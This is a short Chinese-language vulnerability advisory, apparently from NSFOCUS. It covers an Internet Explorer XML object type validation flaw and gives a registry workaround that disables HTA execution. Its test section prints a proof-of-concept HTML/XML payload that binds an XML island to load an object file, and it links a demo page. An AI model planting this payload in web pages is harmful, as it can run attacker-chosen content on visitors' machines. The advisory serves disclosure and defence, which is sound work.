|
Microsoft Internet Explorer XML页对象类型确认漏洞(2)
链接 http://marc.theaimsgroup.com/?l=bugtraq&m=106304876523459&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http-equiv (http-equiv@malware.com)提供了如下测试方法:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" data="badnews.PHP"></object>
]]>
</exploit>
</security>
</xml>
演示页面如下:
http://www.malware.com/greymagic.html
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 通过更改'application/hta'键值来关闭HTA应用程序的执行:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type
更改application/hta为任意值。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.ASP
|
